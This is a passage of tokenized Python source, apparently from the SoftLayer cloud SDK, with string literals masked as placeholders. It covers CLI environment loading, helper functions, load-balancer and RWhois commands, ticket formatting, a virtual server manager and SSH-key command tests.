<EOL> if self . _modules_loaded is True : <EOL> return <EOL> self . load_modules_from_python ( routes . ALL_ROUTES ) <EOL> self . aliases . update ( routes . ALL_ALIASES ) <EOL> self . _load_modules_from_entry_points ( '<STR_LIT>' ) <EOL> self . _modules_loaded = True <EOL> def load_modules_from_python ( self , route_list ) : <EOL> """<STR_LIT>""" <EOL> for name , modpath in route_list : <EOL> if '<STR_LIT::>' in modpath : <EOL> path , attr = modpath . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> else : <EOL> path , attr = modpath , None <EOL> self . commands [ name ] = ModuleLoader ( path , attr = attr ) <EOL> def _load_modules_from_entry_points ( self , entry_point_group ) : <EOL> """<STR_LIT>""" <EOL> for obj in pkg_resources . iter_entry_points ( group = entry_point_group , <EOL> name = None ) : <EOL> self . commands [ obj . name ] = obj <EOL> def ensure_client ( self , config_file = None , is_demo = False , proxy = None ) : <EOL> """<STR_LIT>""" <EOL> if self . client is not None : <EOL> return <EOL> if is_demo : <EOL> client = SoftLayer . BaseClient ( <EOL> transport = SoftLayer . FixtureTransport ( ) , <EOL> auth = None , <EOL> ) <EOL> else : <EOL> client = SoftLayer . create_client_from_env ( <EOL> proxy = proxy , <EOL> config_file = config_file , <EOL> ) <EOL> self . client = client <EOL> class ModuleLoader ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , import_path , attr = None ) : <EOL> self . import_path = import_path <EOL> self . attr = attr <EOL> def load ( self ) : <EOL> """<STR_LIT>""" <EOL> module = importlib . import_module ( self . import_path ) <EOL> if self . attr : <EOL> return getattr ( module , self . attr ) <EOL> return module <EOL> pass_env = click . make_pass_decorator ( Environment , ensure = True ) </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> from SoftLayer . CLI import exceptions <EOL> def multi_option ( * param_decls , ** attrs ) : <EOL> """<STR_LIT>""" <EOL> attrhelp = attrs . get ( '<STR_LIT>' , None ) <EOL> if attrhelp is not None : <EOL> newhelp = attrhelp + "<STR_LIT>" <EOL> attrs [ '<STR_LIT>' ] = newhelp <EOL> attrs [ '<STR_LIT>' ] = True <EOL> return click . option ( * param_decls , ** attrs ) <EOL> def resolve_id ( resolver , identifier , name = '<STR_LIT:object>' ) : <EOL> """<STR_LIT>""" <EOL> ids = resolver ( identifier ) <EOL> if len ( ids ) == <NUM_LIT:0> : <EOL> raise exceptions . CLIAbort ( "<STR_LIT>" <EOL> % ( name , identifier ) ) <EOL> if len ( ids ) > <NUM_LIT:1> : <EOL> raise exceptions . CLIAbort ( <EOL> "<STR_LIT>" % <EOL> ( name , identifier , '<STR_LIT:U+002CU+0020>' . join ( [ str ( _id ) for _id in ids ] ) ) ) <EOL> return ids [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> import SoftLayer <EOL> from SoftLayer . CLI import environment <EOL> from SoftLayer . CLI import exceptions <EOL> from SoftLayer . CLI import formatting <EOL> from SoftLayer . CLI import loadbal <EOL> @ click . command ( ) <EOL> @ click . argument ( '<STR_LIT>' ) <EOL> @ environment . pass_env <EOL> def cli ( env , identifier ) : <EOL> """<STR_LIT>""" <EOL> mgr = SoftLayer . LoadBalancerManager ( env . client ) <EOL> _ , service_id = loadbal . parse_id ( identifier ) <EOL> if not ( env . skip_confirmations or <EOL> formatting . confirm ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) : <EOL> raise exceptions . CLIAbort ( '<STR_LIT>' ) <EOL> mgr . toggle_service_status ( service_id ) <EOL> env . fout ( '<STR_LIT>' % identifier ) </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> import SoftLayer <EOL> from SoftLayer . CLI import environment <EOL> from SoftLayer . CLI import exceptions <EOL> @ click . command ( ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = '<STR_LIT>' ) <EOL> @ click . option ( '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> @ environment . pass_env <EOL> def cli ( env , abuse , address1 , address2 , city , company , country , firstname , <EOL> lastname , postal , public , state ) : <EOL> """<STR_LIT>""" <EOL> mgr = SoftLayer . NetworkManager ( env . client ) <EOL> update = { <EOL> '<STR_LIT>' : abuse , <EOL> '<STR_LIT>' : address1 , <EOL> '<STR_LIT>' : address2 , <EOL> '<STR_LIT>' : company , <EOL> '<STR_LIT>' : city , <EOL> '<STR_LIT>' : country , <EOL> '<STR_LIT>' : firstname , <EOL> '<STR_LIT>' : lastname , <EOL> '<STR_LIT>' : postal , <EOL> '<STR_LIT:state>' : state , <EOL> '<STR_LIT>' : public , <EOL> } <EOL> if public is True : <EOL> update [ '<STR_LIT>' ] = False <EOL> elif public is False : <EOL> update [ '<STR_LIT>' ] = True <EOL> check = [ x for x in update . values ( ) if x is not None ] <EOL> if not check : <EOL> raise exceptions . CLIAbort ( <EOL> "<STR_LIT>" ) <EOL> mgr . edit_rwhois ( ** update ) </s>
<s> """<STR_LIT>""" <EOL> import click <EOL> from SoftLayer . CLI import formatting <EOL> TEMPLATE_MSG = "<STR_LIT>" <EOL> def get_ticket_results ( mgr , ticket_id , update_count = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> ticket = mgr . get_ticket ( ticket_id ) <EOL> table = formatting . KeyValueTable ( [ '<STR_LIT:name>' , '<STR_LIT:value>' ] ) <EOL> table . align [ '<STR_LIT:name>' ] = '<STR_LIT:r>' <EOL> table . align [ '<STR_LIT:value>' ] = '<STR_LIT:l>' <EOL> table . add_row ( [ '<STR_LIT:id>' , ticket [ '<STR_LIT:id>' ] ] ) <EOL> table . add_row ( [ '<STR_LIT:title>' , ticket [ '<STR_LIT:title>' ] ] ) <EOL> if ticket . get ( '<STR_LIT>' ) : <EOL> user = ticket [ '<STR_LIT>' ] <EOL> table . add_row ( [ <EOL> '<STR_LIT:user>' , <EOL> "<STR_LIT>" % ( user . get ( '<STR_LIT>' ) , user . get ( '<STR_LIT>' ) ) , <EOL> ] ) <EOL> table . add_row ( [ '<STR_LIT:status>' , ticket [ '<STR_LIT:status>' ] [ '<STR_LIT:name>' ] ] ) <EOL> table . add_row ( [ '<STR_LIT>' , ticket . get ( '<STR_LIT>' ) ] ) <EOL> table . add_row ( [ '<STR_LIT>' , ticket . get ( '<STR_LIT>' ) ] ) <EOL> updates = ticket . get ( '<STR_LIT>' , [ ] ) <EOL> count = min ( len ( updates ) , update_count ) <EOL> count_offset = len ( updates ) - count + <NUM_LIT:1> <EOL> for i , update in enumerate ( updates [ - count : ] ) : <EOL> wrapped_entry = "<STR_LIT>" <EOL> editor = update . get ( '<STR_LIT>' ) <EOL> if editor : <EOL> if editor . get ( '<STR_LIT>' ) : <EOL> wrapped_entry += "<STR_LIT>" % ( editor [ '<STR_LIT>' ] ) <EOL> if editor . get ( '<STR_LIT>' ) : <EOL> wrapped_entry += "<STR_LIT>" % ( editor . get ( '<STR_LIT>' ) , <EOL> editor . get ( '<STR_LIT>' ) ) <EOL> wrapped_entry += click . wrap_text ( update [ '<STR_LIT>' ] . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) ) <EOL> table . add_row ( [ '<STR_LIT>' % ( count_offset + i , ) , wrapped_entry ] ) <EOL> return table </s>
<s> """<STR_LIT>""" <EOL> from SoftLayer import consts <EOL> from SoftLayer . API import * <EOL> from SoftLayer . managers import * <EOL> from SoftLayer . exceptions import * <EOL> from SoftLayer . auth import * <EOL> from SoftLayer . transports import * <EOL> __title__ = '<STR_LIT>' <EOL> __version__ = consts . VERSION <EOL> __author__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> __all__ = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] </s>
<s> getObject = { '<STR_LIT>' : { '<STR_LIT>' : { '<STR_LIT:id>' : <NUM_LIT> } } } </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import itertools <EOL> import socket <EOL> import time <EOL> from SoftLayer import exceptions <EOL> from SoftLayer . managers import ordering <EOL> from SoftLayer import utils <EOL> class VSManager ( utils . IdentifierMixin , object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , ordering_manager = None ) : <EOL> self . client = client <EOL> self . account = client [ '<STR_LIT>' ] <EOL> self . guest = client [ '<STR_LIT>' ] <EOL> self . resolvers = [ self . _get_ids_from_ip , self . _get_ids_from_hostname ] <EOL> if ordering_manager is None : <EOL> self . ordering_manager = ordering . OrderingManager ( client ) <EOL> else : <EOL> self . ordering_manager = ordering_manager <EOL> def list_instances ( self , hourly = True , monthly = True , tags = None , cpus = None , <EOL> memory = None , hostname = None , domain = None , <EOL> local_disk = None , datacenter = None , nic_speed = None , <EOL> public_ip = None , private_ip = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in kwargs : <EOL> items = [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> ] <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( items ) <EOL> call = '<STR_LIT>' <EOL> if not all ( [ hourly , monthly ] ) : <EOL> if hourly : <EOL> call = '<STR_LIT>' <EOL> elif monthly : <EOL> call = '<STR_LIT>' <EOL> _filter = utils . NestedDict ( kwargs . get ( '<STR_LIT>' ) or { } ) <EOL> if tags : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ { '<STR_LIT:name>' : '<STR_LIT:data>' , '<STR_LIT:value>' : tags } ] , <EOL> } <EOL> if cpus : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( cpus ) <EOL> if memory : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( memory ) <EOL> if hostname : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( hostname ) <EOL> if domain : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = utils . query_filter ( domain ) <EOL> if local_disk is not None : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( bool ( local_disk ) ) ) <EOL> if datacenter : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] = ( <EOL> utils . query_filter ( datacenter ) ) <EOL> if nic_speed : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( nic_speed ) ) <EOL> if public_ip : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( public_ip ) ) <EOL> if private_ip : <EOL> _filter [ '<STR_LIT>' ] [ '<STR_LIT>' ] = ( <EOL> utils . query_filter ( private_ip ) ) <EOL> kwargs [ '<STR_LIT>' ] = _filter . to_dict ( ) <EOL> func = getattr ( self . account , call ) <EOL> return func ( ** kwargs ) <EOL> def get_instance ( self , instance_id , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in kwargs : <EOL> items = [ <EOL> '<STR_LIT:id>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:status>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '''<STR_LIT>''' , <EOL> '''<STR_LIT>''' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> kwargs [ '<STR_LIT>' ] = "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( items ) <EOL> return self . guest . getObject ( id = instance_id , ** kwargs ) <EOL> def get_create_options ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . guest . getCreateObjectOptions ( ) <EOL> def cancel_instance ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> return self . guest . deleteObject ( id = instance_id ) <EOL> def reload_instance ( self , instance_id , <EOL> post_uri = None , <EOL> ssh_keys = None , <EOL> image_id = None ) : <EOL> """<STR_LIT>""" <EOL> config = { } <EOL> if post_uri : <EOL> config [ '<STR_LIT>' ] = post_uri <EOL> if ssh_keys : <EOL> config [ '<STR_LIT>' ] = [ key_id for key_id in ssh_keys ] <EOL> if image_id : <EOL> config [ '<STR_LIT>' ] = image_id <EOL> return self . client . call ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , config , id = instance_id ) <EOL> def _generate_create_dict ( <EOL> self , cpus = None , memory = None , hourly = True , <EOL> hostname = None , domain = None , local_disk = True , <EOL> datacenter = None , os_code = None , image_id = None , <EOL> dedicated = False , public_vlan = None , private_vlan = None , <EOL> userdata = None , nic_speed = None , disks = None , post_uri = None , <EOL> private = False , ssh_keys = None ) : <EOL> """<STR_LIT>""" <EOL> required = [ cpus , memory , hostname , domain ] <EOL> mutually_exclusive = [ <EOL> { '<STR_LIT>' : os_code , "<STR_LIT>" : image_id } , <EOL> ] <EOL> if not all ( required ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for mu_ex in mutually_exclusive : <EOL> if all ( mu_ex . values ( ) ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( '<STR_LIT:U+002C>' . join ( mu_ex . keys ( ) ) ) ) <EOL> data = { <EOL> "<STR_LIT>" : int ( cpus ) , <EOL> "<STR_LIT>" : int ( memory ) , <EOL> "<STR_LIT>" : hostname , <EOL> "<STR_LIT>" : domain , <EOL> "<STR_LIT>" : local_disk , <EOL> } <EOL> data [ "<STR_LIT>" ] = hourly <EOL> if dedicated : <EOL> data [ "<STR_LIT>" ] = dedicated <EOL> if private : <EOL> data [ '<STR_LIT>' ] = private <EOL> if image_id : <EOL> data [ "<STR_LIT>" ] = { "<STR_LIT>" : image_id } <EOL> elif os_code : <EOL> data [ "<STR_LIT>" ] = os_code <EOL> if datacenter : <EOL> data [ "<STR_LIT>" ] = { "<STR_LIT:name>" : datacenter } <EOL> if public_vlan : <EOL> data . update ( { <EOL> '<STR_LIT>' : { <EOL> "<STR_LIT>" : { "<STR_LIT:id>" : int ( public_vlan ) } } } ) <EOL> if private_vlan : <EOL> data . update ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { "<STR_LIT:id>" : int ( private_vlan ) } } } ) <EOL> if userdata : <EOL> data [ '<STR_LIT>' ] = [ { '<STR_LIT:value>' : userdata } ] <EOL> if nic_speed : <EOL> data [ '<STR_LIT>' ] = [ { '<STR_LIT>' : nic_speed } ] <EOL> if disks : <EOL> data [ '<STR_LIT>' ] = [ <EOL> { "<STR_LIT>" : "<STR_LIT:0>" , "<STR_LIT>" : { "<STR_LIT>" : disks [ <NUM_LIT:0> ] } } <EOL> ] <EOL> for dev_id , disk in enumerate ( disks [ <NUM_LIT:1> : ] , start = <NUM_LIT:2> ) : <EOL> data [ '<STR_LIT>' ] . append ( <EOL> { <EOL> "<STR_LIT>" : str ( dev_id ) , <EOL> "<STR_LIT>" : { "<STR_LIT>" : disk } <EOL> } <EOL> ) <EOL> if post_uri : <EOL> data [ '<STR_LIT>' ] = post_uri <EOL> if ssh_keys : <EOL> data [ '<STR_LIT>' ] = [ { '<STR_LIT:id>' : key_id } for key_id in ssh_keys ] <EOL> return data <EOL> def wait_for_transaction ( self , instance_id , limit , delay = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> return self . wait_for_ready ( instance_id , limit , delay = delay , <EOL> pending = True ) <EOL> def wait_for_ready ( self , instance_id , limit , delay = <NUM_LIT:1> , pending = False ) : <EOL> """<STR_LIT>""" <EOL> until = time . time ( ) + limit <EOL> for new_instance in itertools . repeat ( instance_id ) : <EOL> mask = """<STR_LIT>""" <EOL> instance = self . get_instance ( new_instance , mask = mask ) <EOL> last_reload = utils . lookup ( instance , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:id>' ) <EOL> active_transaction = utils . lookup ( instance , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:id>' ) <EOL> reloading = all ( ( <EOL> active_transaction , <EOL> last_reload , <EOL> last_reload == active_transaction , <EOL> ) ) <EOL> outstanding = False <EOL> if pending : <EOL> outstanding = active_transaction <EOL> if all ( [ instance . get ( '<STR_LIT>' ) , <EOL> not reloading , <EOL> not outstanding ] ) : <EOL> return True <EOL> now = time . time ( ) <EOL> if now >= until : <EOL> return False <EOL> time . sleep ( min ( delay , until - now ) ) <EOL> def verify_create_instance ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs . pop ( '<STR_LIT>' , None ) <EOL> create_options = self . _generate_create_dict ( ** kwargs ) <EOL> return self . guest . generateOrderTemplate ( create_options ) <EOL> def create_instance ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tags = kwargs . pop ( '<STR_LIT>' , None ) <EOL> inst = self . guest . createObject ( self . _generate_create_dict ( ** kwargs ) ) <EOL> if tags is not None : <EOL> self . guest . setTags ( tags , id = inst [ '<STR_LIT:id>' ] ) <EOL> return inst <EOL> def create_instances ( self , config_list ) : <EOL> """<STR_LIT>""" <EOL> tags = [ conf . pop ( '<STR_LIT>' , None ) for conf in config_list ] <EOL> resp = self . guest . createObjects ( [ self . _generate_create_dict ( ** kwargs ) <EOL> for kwargs in config_list ] ) <EOL> for instance , tag in zip ( resp , tags ) : <EOL> if tag is not None : <EOL> self . guest . setTags ( tag , id = instance [ '<STR_LIT:id>' ] ) <EOL> return resp <EOL> def change_port_speed ( self , instance_id , public , speed ) : <EOL> """<STR_LIT>""" <EOL> if public : <EOL> return self . client . call ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> speed , id = instance_id ) <EOL> else : <EOL> return self . client . call ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> speed , id = instance_id ) <EOL> def _get_ids_from_hostname ( self , hostname ) : <EOL> """<STR_LIT>""" <EOL> results = self . list_instances ( hostname = hostname , mask = "<STR_LIT:id>" ) <EOL> return [ result [ '<STR_LIT:id>' ] for result in results ] <EOL> def _get_ids_from_ip ( self , ip_address ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> socket . inet_aton ( ip_address ) <EOL> except socket . error : <EOL> return [ ] <EOL> results = self . list_instances ( public_ip = ip_address , mask = "<STR_LIT:id>" ) <EOL> if results : <EOL> return [ result [ '<STR_LIT:id>' ] for result in results ] <EOL> results = self . list_instances ( private_ip = ip_address , mask = "<STR_LIT:id>" ) <EOL> if results : <EOL> return [ result [ '<STR_LIT:id>' ] for result in results ] <EOL> def edit ( self , instance_id , userdata = None , hostname = None , domain = None , <EOL> notes = None , tags = None ) : <EOL> """<STR_LIT>""" <EOL> obj = { } <EOL> if userdata : <EOL> self . guest . setUserMetadata ( [ userdata ] , id = instance_id ) <EOL> if tags is not None : <EOL> self . guest . setTags ( tags , id = instance_id ) <EOL> if hostname : <EOL> obj [ '<STR_LIT>' ] = hostname <EOL> if domain : <EOL> obj [ '<STR_LIT>' ] = domain <EOL> if notes : <EOL> obj [ '<STR_LIT>' ] = notes <EOL> if not obj : <EOL> return True <EOL> return self . guest . editObject ( obj , id = instance_id ) <EOL> def rescue ( self , instance_id ) : <EOL> """<STR_LIT>""" <EOL> return self . guest . executeRescueLayer ( id = instance_id ) <EOL> def capture ( self , instance_id , name , additional_disks = False , notes = None ) : <EOL> """<STR_LIT>""" <EOL> vsi = self . get_instance ( instance_id ) <EOL> disk_filter = lambda x : x [ '<STR_LIT>' ] == '<STR_LIT:0>' <EOL> if additional_disks : <EOL> disk_filter = lambda x : ( str ( x [ '<STR_LIT>' ] ) != '<STR_LIT:1>' and <EOL> x [ '<STR_LIT>' ] != '<STR_LIT>' ) <EOL> disks = [ block_device for block_device in vsi [ '<STR_LIT>' ] <EOL> if disk_filter ( block_device ) ] <EOL> return self . guest . createArchiveTransaction ( <EOL> name , disks , notes , id = instance_id ) <EOL> def upgrade ( self , instance_id , cpus = None , memory = None , <EOL> nic_speed = None , public = True ) : <EOL> """<STR_LIT>""" <EOL> package_items = self . _get_package_items ( ) <EOL> prices = [ ] <EOL> for option , value in { '<STR_LIT>' : cpus , <EOL> '<STR_LIT>' : memory , <EOL> '<STR_LIT>' : nic_speed } . items ( ) : <EOL> if not value : <EOL> continue <EOL> price_id = self . _get_price_id_for_upgrade ( package_items , <EOL> option , <EOL> value , <EOL> public ) <EOL> if not price_id : <EOL> raise exceptions . SoftLayerError ( <EOL> "<STR_LIT>" % ( option , value ) ) <EOL> prices . append ( { '<STR_LIT:id>' : price_id } ) <EOL> maintenance_window = datetime . datetime . now ( utils . UTC ( ) ) <EOL> order = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : prices , <EOL> '<STR_LIT>' : [ { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:value>' : maintenance_window . strftime ( "<STR_LIT>" ) <EOL> } ] , <EOL> '<STR_LIT>' : [ { '<STR_LIT:id>' : int ( instance_id ) } ] , <EOL> } <EOL> if prices : <EOL> self . client [ '<STR_LIT>' ] . placeOrder ( order ) <EOL> return True <EOL> return False <EOL> def _get_package_items ( self ) : <EOL> """<STR_LIT>""" <EOL> mask = [ <EOL> '<STR_LIT:description>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mask = "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( mask ) <EOL> package_type = "<STR_LIT>" <EOL> package_id = self . ordering_manager . get_package_id_by_type ( package_type ) <EOL> package_service = self . client [ '<STR_LIT>' ] <EOL> return package_service . getItems ( id = package_id , mask = mask ) <EOL> def _get_price_id_for_upgrade ( self , package_items , option , value , <EOL> public = True ) : <EOL> """<STR_LIT>""" <EOL> option_category = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> category_code = option_category [ option ] <EOL> for item in package_items : <EOL> is_private = str ( item [ '<STR_LIT:description>' ] ) . startswith ( '<STR_LIT>' ) <EOL> for price in item [ '<STR_LIT>' ] : <EOL> if '<STR_LIT>' in price and price [ '<STR_LIT>' ] : <EOL> continue <EOL> if '<STR_LIT>' not in price : <EOL> continue <EOL> categories = price [ '<STR_LIT>' ] <EOL> for category in categories : <EOL> if not ( category [ '<STR_LIT>' ] == category_code <EOL> and str ( item [ '<STR_LIT>' ] ) == str ( value ) ) : <EOL> continue <EOL> if option == '<STR_LIT>' : <EOL> if public and not is_private : <EOL> return price [ '<STR_LIT:id>' ] <EOL> elif not public and is_private : <EOL> return price [ '<STR_LIT:id>' ] <EOL> elif option == '<STR_LIT>' : <EOL> if '<STR_LIT>' in item [ '<STR_LIT:description>' ] : <EOL> return price [ '<STR_LIT:id>' ] <EOL> else : <EOL> return price [ '<STR_LIT:id>' ] </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import os . path <EOL> import tempfile <EOL> import mock <EOL> from SoftLayer import testing <EOL> class SshKeyTests ( testing . TestCase ) : <EOL> def test_add_by_option ( self ) : <EOL> service = self . client [ '<STR_LIT>' ] <EOL> mock_key = service . getObject ( ) [ '<STR_LIT:key>' ] <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % mock_key , <EOL> '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> "<STR_LIT>" ) <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> args = ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:key>' : mock_key , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , ) ) <EOL> def test_add_by_file ( self ) : <EOL> path = os . path . join ( testing . FIXTURE_PATH , '<STR_LIT>' ) <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % path ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> "<STR_LIT>" ) <EOL> service = self . client [ '<STR_LIT>' ] <EOL> mock_key = service . getObject ( ) [ '<STR_LIT:key>' ] <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> args = ( { '<STR_LIT>' : None , <EOL> '<STR_LIT:key>' : mock_key , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , ) ) <EOL> def test_remove_key ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> identifier = <NUM_LIT> ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_remove_key_fail ( self , ngb_mock ) : <EOL> ngb_mock . return_value = False <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:2> ) <EOL> def test_edit_key ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assert_called_with ( '<STR_LIT>' , '<STR_LIT>' , <EOL> args = ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , ) , <EOL> identifier = <NUM_LIT> ) <EOL> def test_edit_key_fail ( self ) : <EOL> fixture = self . set_mock ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fixture . return_value = False <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:2> ) <EOL> def test_list_keys ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT:list>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> [ { '<STR_LIT>' : '<STR_LIT:->' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:id>' : '<STR_LIT:100>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT:label>' : '<STR_LIT>' } ] ) <EOL> def test_print_key ( self ) : <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( json . loads ( result . output ) , <EOL> { '<STR_LIT:id>' : <NUM_LIT> , '<STR_LIT:label>' : '<STR_LIT:label>' , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def test_print_key_file ( self ) : <EOL> with tempfile . NamedTemporaryFile ( ) as sshkey_file : <EOL> service = self . client [ '<STR_LIT>' ] <EOL> mock_key = service . getObject ( ) [ '<STR_LIT:key>' ] <EOL> result = self . run_command ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' % sshkey_file . name ] ) <EOL> self . assertEqual ( result . exit_code , <NUM_LIT:0> ) <EOL> self . assertEqual ( mock_key , sshkey_file . read ( ) . decode ( "<STR_LIT:utf-8>" ) ) 